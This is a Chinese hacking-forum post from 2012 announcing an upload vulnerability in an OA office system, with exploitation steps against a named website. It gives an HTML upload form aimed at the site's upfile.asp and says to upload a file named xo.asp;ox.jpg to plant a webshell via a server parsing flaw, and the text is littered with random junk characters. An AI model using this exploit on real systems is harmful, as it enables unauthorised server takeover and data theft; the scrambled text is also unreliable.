找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2356|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞9 Z6 ]) j9 ~* Y  x; N
​0 Y6 D) q+ _- H  l: x; z
系统介绍:4 Z5 u# S: T6 m4 x  K# q2 C- j
& t- U2 _4 ^) Z: I, ~4 X2 }
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。- Z' ]7 C' a3 \
, V$ E4 e. e" B) ?8 ^6 a0 t4 Q
主要功能:
: Q+ j0 L4 H" @公司通告
1 @( V& h" g+ L0 ]# i5 H工作计划 ! r: ?6 C0 e! G- j) b: w
通讯助理 2 k+ `0 ^$ C  U" i4 C
客户资源 / K; g8 g3 C0 H0 ~! z+ u2 ]
我的公文 * F0 l; T+ H- U2 s$ k8 J
公文传阅
/ k* q6 k6 h  M6 ]  u公共资源 / B2 G$ j9 n3 o5 ]! A, I
资源预约 9 @, D3 N$ B; b
今日考勤 + Z4 P+ I' S2 {( P
个人计划
: u3 \9 v/ m3 b, C9 o2 A5 G  }5 d个人通讯录
( N3 ^( R+ ^7 T( v- M7 e% I个人基本档案
5 [1 x' L2 d4 j. L$ P3 {. b未读邮件
: ^% Y! N9 v# D6 n发邮件 ; k: a# H7 Q4 H, D
收件夹
" `; P* v& x9 O6 ]寄件夹
9 @6 t' k6 V2 N4 o* o! ~2 I网络硬盘
) }* L) H+ A. c: p/ ~) O% z. ]网络会议
, J* {5 A7 N& m* [7 y9 @网络调查
& w" g* U+ Y; v4 Z+ h: C8 Q6 b9 \2 K. F交流论坛
* T3 M- B" M( h9 `$ L+ |+ w3 h2 ?; h: G" B# ^( J5 `7 n' q4 ^
有兴趣测试的朋友可以下源码看看
; P" Q& [: T0 }" s4 w% T
  R  r# ]0 G9 z( o& k* m1 s9 P源码下载:; m, U& O, ~4 F: {' g' [
1 \8 I1 _# O9 k1 U7 W5 v
http://www.mycodes.net/30/4750.htm
7 U" |# o8 l/ ?3 j1 W* h' G7 y1 M) x& D
漏洞介绍:  s: g" A- G: v: d7 C" v: o# B7 g
3 O; a% e8 F# F, s" w
由upfile.asp上传文件漏洞引起# Q) e: g  J' \, k% B5 O- z  Y/ [

9 E' Z  z3 v. H4 H5 X8 p- K测试方法:
! F. i4 y- f& R5 z) l/ W
& b9 T) }  ]0 N% q0 m& l: h% O使用名小子上传http://www.itlynn.com/upfile.asp即可+ u/ h: P$ O  P

6 G2 p. c, O' j8 V# h如果upfile.asp文件被删除不存在。
% P% a9 }+ O% M
! X: I8 q! [  K$ m8 j  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。: s9 G7 o. r4 {1 r% `0 }% A; }, b8 E
8 E) k- d7 @* t, p) `, }
如果存在那么将如下代码保存为upfile.html。
: Q, Z( \6 {, G& h* F% w# \% A& k- ^" Z9 \
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
9 N/ v: ~& X$ |: k8 F3 T8 d- U+ n+ \. Z4 u7 i
* c  t8 H; n9 G) Z
/ h* r' y- V$ G& j
01 <table border='0' align="center" cellpadding="5"> - @( k9 k7 P; z/ Y0 Y
3 ^( }8 I6 i% ^; `
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> ) _: g7 D" I8 j0 T

3 H9 B! T1 @2 [03 <tr> 6 H! q- ?0 ~! u  m5 x
& Y0 y3 X4 V' _  o8 L: A; E; ]
04             <td>报错:</td> % e5 t9 w; V6 E3 z# I

; |4 K2 |# M! S: n$ l05             <td><input type='radio' name='errnumber' value='0'> ) P- Q" \4 j2 o8 V/ y! x

) ]* v9 q6 U* r1 g% F06               自动更名 $ v; G" R7 `- |* c  M

9 R. q8 E8 @, F3 {8 l$ J; C07               <input type='radio' name='errnumber' value='1' checked>
7 l% F3 q5 H) C, s% {/ U6 I5 G4 D* _9 ]. D  [. q
08               报错方式
7 X: j- I( O; p' n6 h! L
! o7 h0 G; d% u8 B09               <input type='radio' name='errnumber' value='2'> 8 N3 [6 R2 ^0 S- i! @+ r
* J* n4 i& _- w6 s3 ^# d* z$ @
10               直接覆盖</td> # f: E$ x4 h4 y) T
' M+ y) u" A8 b8 s* K; O: m+ e
11           </tr>
" ~" J9 ]4 n0 e/ V3 d7 X$ l- r* ~; i3 r( T0 O1 m  J
12           <tr> 3 C# m& c% a; Z0 Y/ I3 c/ c* h; x

- I2 t+ C( O4 I9 ]1 z13             <td>主题:</td>
+ q8 ]( R2 T5 x; W, F/ _3 m. B1 I
- ?- T, d- c' e  `14             <td><input type='text' name='filename' size='30'></td>
( U) h# q+ k7 p+ z8 w
6 }' x- Q6 I7 n; c1 V15           </tr> , z* |( N7 f: k/ H% j! [1 C. h

1 l" b4 a; A  l" f: E3 c9 B16           <tr> 7 r; r! Y: I# P8 B4 X

1 a. b) B  q+ T/ V17             <td>文件:</td> 2 G4 d8 o+ H6 S/ }

2 U; w7 R, E' `5 b+ B( s% T18             <td><input type="file"name="fruit"size="30"></td>
, W/ \2 x2 Y% J9 c4 s& I. ]2 ?/ ^! {5 i, o1 f8 H
19           </tr>
2 z: W% l* |6 t$ }6 v' j+ A# |$ ~6 a) o* d/ K: i8 `/ g+ N6 m6 z
20           <tr> 3 m, w0 }: N, v5 b& o

- Q& x) A3 @  K3 n/ A8 f9 K, w21             <td valign='top'>简介:</td> & X6 K$ `/ _. D
4 ~( n1 G5 H7 d; Y" b" Q3 e* z: r
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> : r# ^, D# `/ }* t0 L8 T% _

, a0 t9 @  B/ D2 D1 s23           </tr> : B0 T9 R: F( q
! W, U- t; T' \# C# W& J
24   0 Q7 Y5 \1 Z' ~7 z: }
: H& M6 Y* f) A% ~0 ?) S  b; Q
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 5 I( R( Y# l7 s& s1 F$ d8 D

) Y; B. d- o- M# U( A+ l8 l6 b26           </tr>
7 |" E" j( s9 b) q2 \& r) C/ u/ }2 @. O) y2 Y* c
27         </form>
( Y& Z1 {# ]' V! m4 M1 ?  k) w; g& I: Z6 A4 f5 {% O! Q
然后打开上传一个文件名为xo.asp;ox.jpg的文件。# B4 \, m1 U0 N, O. f1 i; d" k
5 |# w" S6 K5 \; w' E0 I1 z" k
+ }- x+ D5 d7 U

( G% t) g8 M; e$ G2 v8 R  e上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
7 j% n2 h4 \. b8 b$ d8 i
. z0 ~. |0 X/ N5 H' c! X9 k+ I' b此漏洞需要配合解析漏洞利用。
5 r3 r8 B6 A3 z. e0 l
+ p. r6 e' x& t" K1 O+ W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表